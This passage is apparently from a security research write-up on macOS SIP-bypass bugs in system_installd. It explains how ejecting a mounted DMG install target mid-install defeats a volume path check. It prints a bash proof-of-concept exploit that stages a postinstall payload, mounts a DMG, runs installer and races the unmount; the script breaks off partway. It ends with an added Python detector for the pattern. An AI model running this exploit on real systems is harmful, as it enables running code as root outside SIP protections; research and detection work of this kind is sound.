Diving into an Old Exploit Chain and Discovering 3 new SIP-Bypass Vulnerabilities

A new bypass appears

The aforementioned patch shows that if the volume path check at line 81 can be bypassed, the system_installd service will spawn the script directly instead of resorting to the isolated XPC service.

The question then is, how can we bypass the volume path check? Through debugging, we found that the destination volume path returned at line 80 is an arbitrary mounted DMG volume path that we specified from the installer command line.

So what happens if we eject the DMG volume immediately before the check? Testing this, we found that line 80 then returns the root volume, so the check at line 81 is bypassed as expected.

Here is how the exploitation works using a bash script:

#!/bin/bash

echo "[*] preparing the payload..."
MOUNT_DIR="/tmp/.exploit"
PAYLOAD_DIR="$MOUNT_DIR/payload"
PAYLOAD_POST_PATH="$PAYLOAD_DIR/postinstall"
PAYLOAD_PRE_PATH="$PAYLOAD_DIR/preinstall"
mkdir -p "$PAYLOAD_DIR"
# create postinstall script
echo "#!/bin/bash" > "$PAYLOAD_POST_PATH"
echo $1 >> "$PAYLOAD_POST_PATH"
chmod +x "$PAYLOAD_POST_PATH"
# create preinstall script just to make the exploit more elegant
echo "#!/bin/bash" > "$PAYLOAD_PRE_PATH"
echo "echo 'just a place holder, our payload is in the postinstall.'" >> "$PAYLOAD_PRE_PATH"
chmod +x "$PAYLOAD_PRE_PATH"

echo "[*] preparing the dmg mounting..."
hdiutil create -size 50m -volname .exploit -ov disk.dmg
hdiutil attach -mountpoint $MOUNT_DIR disk.dmg

sudo echo "[*] all the preparations are done."
sudo installer -pkg $2 -target $MOUNT_DIR &

echo "[*] waiting for installer..."
while true ; do
    target=`compgen -G "$MOUNT_DIR/.PKInstallSandboxManager-SystemSoftware/*/OpenPath*/Scripts/*/postinstall"`
    if [ $target ]; then
          #hdiutil detach $MOUNT_DIR
          #detach is slow, kill the process will help us eject the dmg immediately, to win the race condition.
          kill
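
From a detection standpoint, the sequence described above is observable: an install aimed at a mounted volume, that volume disappearing mid-install, then system_installd spawning a package script directly. The following is an added example, not code from the original post; the event schema, field names, paths and sample events are all constructed assumptions rather than a real telemetry format.

```python
from dataclasses import dataclass

@dataclass
class Event:               # hypothetical schema, not a real telemetry format
    ts: float              # seconds since start of capture
    kind: str              # "exec" or "unmount"
    process: str = ""      # executable name (exec)
    parent: str = ""       # parent executable name (exec)
    args: tuple = ()       # argv after the executable (exec)
    path: str = ""         # executed file (exec) or mount point (unmount)

SCRIPT_NAMES = {"preinstall", "postinstall"}

def target_of(args):
    """Value following -target on an installer command line, or None."""
    for i, arg in enumerate(args[:-1]):
        if arg == "-target":
            return args[i + 1].rstrip("/") or "/"
    return None

def find_target_ejections(events, window=300.0):
    """Alert when a non-root install target is unmounted and system_installd
    then spawns a package script directly within `window` seconds."""
    alerts, pending, ejected = [], {}, {}
    for ev in sorted(events, key=lambda e: e.ts):
        if ev.kind == "exec" and ev.process == "installer":
            tgt = target_of(ev.args)
            if tgt and tgt != "/":
                pending[tgt] = ev.ts            # install into a mounted volume
        elif ev.kind == "unmount":
            mp = ev.path.rstrip("/")
            if mp in pending and ev.ts - pending[mp] <= window:
                ejected[mp] = ev.ts             # target vanished mid-install
        elif (ev.kind == "exec" and ev.parent == "system_installd"
              and ev.path.rsplit("/", 1)[-1] in SCRIPT_NAMES):
            for mp in [m for m, t in ejected.items() if ev.ts - t <= window]:
                alerts.append({"target": mp, "unmounted_at": ejected.pop(mp),
                               "script": ev.path, "script_at": ev.ts})
                pending.pop(mp, None)
    return alerts

# Constructed sample events (paths and timings are illustrative only).
SAMPLE_EVENTS = [
    Event(1.0, "exec", "installer", "sudo", ("-pkg", "a.pkg", "-target", "/Volumes/Example")),
    Event(4.2, "unmount", path="/Volumes/Example"),
    Event(4.3, "exec", "bash", "system_installd", path="/private/tmp/scripts/postinstall"),
]

if __name__ == "__main__":
    print(find_target_ejections(SAMPLE_EVENTS))
```
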
